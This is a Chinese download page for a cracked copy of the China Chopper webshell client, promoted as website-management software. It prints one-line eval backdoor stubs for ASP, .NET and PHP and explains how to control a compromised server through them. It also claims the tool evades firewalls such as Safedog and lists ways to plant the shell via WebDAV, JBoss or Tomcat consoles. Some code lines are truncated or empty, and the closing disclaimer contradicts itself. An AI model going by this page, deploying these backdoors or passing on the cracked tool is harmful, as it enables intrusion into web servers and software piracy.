【中国菜刀激活版】中国菜刀软件下载 v1.8.0 绿色激活版(附注册码)
软件介绍
中国菜刀破解版是一款由国内大神开发的专业网站管理软件,我们可以通过远程链接WEBSHELL的方式来对网站进行管理。中国菜刀软件适用于所有支持动态脚本的网站,通过这款软件你就可以对网站上的所有内容进行管理,让网站能够正常运营下去。
中国菜刀破解版软件简介
中国菜刀是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。只要支持动态脚本的网站,都可以用中国菜刀来进行管理!程序大小:214K,在非简体中文环境下使用,自动切换到英文界面。UINCODE方式编译,支持多国语言输入显示。
软件功能
1.文件管理:[特色]缓存下载目录,并支持离线查看缓存目录;
2.虚拟终端:[特色]人性化的设计,操作方便;(输入HELP查看更多用法)
3.数据库管理:[特色]图形界面,支持YSQL,MSSQL,ORACLE,INFOMIX,ACCESS
中国菜刀破解版软件特色
一、中国菜刀是一款可视版软件,可连接jsp,php,asp,aspx
二、软件已经更改加密封包,过安全狗与其他防火墙都可过!!!
三、白帽子首选的WEBSHELL连接工具
中国菜刀破解版使用说明
只要支持动态脚本的网站,都可以用中国菜刀来进行管理!主要功能有:文件管理,虚拟终端,数据库管理。
UINCODE方式编译,支持多国语言输入显示。
一、EVAL客户端部分
1)要了解的
服务端只需要简单的一行代码,即可用此程序实现常用的管理功能。
支持的服务端脚本:PHP, ASP,NET。
在服务端运行的代码如下:
PHP:
ASP: <%eval> <%eval>
.NET: <%@ language="Jscript" page=""><%eval(request.item["pass"],"unsafe");%> <%@ language="Jscript" page=""><%eval(request.item["pass"],"unsafe");%>
(注意: .NET要单独一个文件或此文件也是Jscript语言)
2)怎么用
在主视图中右键/添加,在弹出的对话框中输入服务端地址,连接的密码(请注意上例中的pass字串),选择正确的脚本类型和语言编码,保存后即可使用文件管理,虚拟终端,数据库管理三大块功能。要是其它都没错误,那么可能就是你把语言编码选错了。
1. 文件管理:[特色]缓存下载目录,并支持离线查看缓存目录;
2.虚拟终端:[特色]人性化的设计,操作方便;(输入HELP查看更多用法)
3.数据库管理:[特色]图形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS
以入支持ADO方式连接的数据库。
(各种脚本条件下的数据库连接方法请点击数据库管理界面左上角处的配置按钮查看)
注意:由于服务器的安全设置,某些功能可能不能正常使用。
3) 关于配置信息怎么填?
A) 数据库方面:
PHP脚本:
类型 类型可为MYSQL,MSSQL,ORACLE,INFOMIX中的一种
主机地址 主机地址可为机器名或IP地址,如localhost
数据库用户 连接数据库的用户名,如root
数据库密码
连接数据库的密码,如123455
ASP和.NET脚本:
类型 类型只能填ADO
ADO配置信息
ADO连接各种数据库的方式不一样。如MSSQL的配置信息为
Driver={Sql Server};Server=(local);Database=master;Uid=sa;Pwd=123456
B) 其它方面:
添加额外附加提交的数据:应付这种情况:if ($_POST['action']=='test'){@eval($_POST['pass']);}
action=test
提交功能前先POST额外的数据包:会话期间只提交一次。
uid=user1&pwd=123456
二、网站蜘蛛
织出一张网站的目录结构。
下载的列表文件存在桌面,右键菜单/载入URL列表即可以根据地址得到目录结构。
三、定时提醒
当闹钟事使吧, 周期:每月/每周/每日/只一次。
四、快速启动
一些常用的快捷方式放在这里,可以指定用户身份运行程序。这部分数据是以加密存储的。
五、浏览器
地址栏输入HELP,更多精彩后续加入。
六、其它部分
等待加入。
附带工具
update.exe是wsc.exe的数据库wscdb迁移到菜刀的一个小工具。
把wscdb文件整到当前目录,运行update.exe得到新的数据库文件caidao.mdb
把菜刀的数据库db.mdb替换掉即可。
中国菜刀破解版操作说明
数据库管理
中国菜刀支持各种数据库,如MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS等,数据库操作界面,内置了一些常用的 数据库 语句,能够自动显示表名、列名,查询语句,并且内置了常用的数据库语句。如下图:
链接之后,菜刀分享了一些常见的数据库语句,如图:
命令行功能
最后,菜刀分享了一个命令行界面,能够通过命令行shell进行操作系统级别的互动,当然继承的权限是WEB应用的权限。如图:
大小
中国菜刀的服务端脚本非常小,是典型的一句话木马,其中aspx服务端软件只有73字节,见图,相比其他传统的webshell可见它的优越性。
平台:
web服务器平台——JSP, ASP, ASPX, PHP, 或 CFM。同时在Windows和 Linux 适用。在系列一的分析里面已经展示过“中国菜刀”在windows 2003 IIS 中运行ASPX的情况。在这一部分里,讲展示运行在Linux平台下的 PHP 情况。如下图所示,PHP版本的内容极其精简。
依赖与不同的平台,“中国菜刀”有不同的可选项。下图显示了在Linux平台下的文件管理特性,(类似于Windows)
上传机制:
由于它的大小,格式,以及简单的payload,“中国菜刀”的传输机制可以很灵活多样。以下任意一种方法都可以进行传输:
通过WebDAV文件上传
通过JBoss jmx-console 或者 Apache 的Tomcat管理页面上传
远程代码执行下载
通过其他方式接入后传输
通讯分析:
我们已经看过它在 服务器 端的payload以及控制web shell的客户端。接下来,我们检查一下“中国菜刀”的通讯网络流量。我们通过抓包软件,分析其服务端和客户端的通讯情况。
利用抓包软件Wireshark的“follow the TCP”功能可以看到整个TCP数据交互过程。
下载仅供下载体验和测试学习,不得商用和正当使用。
发表评论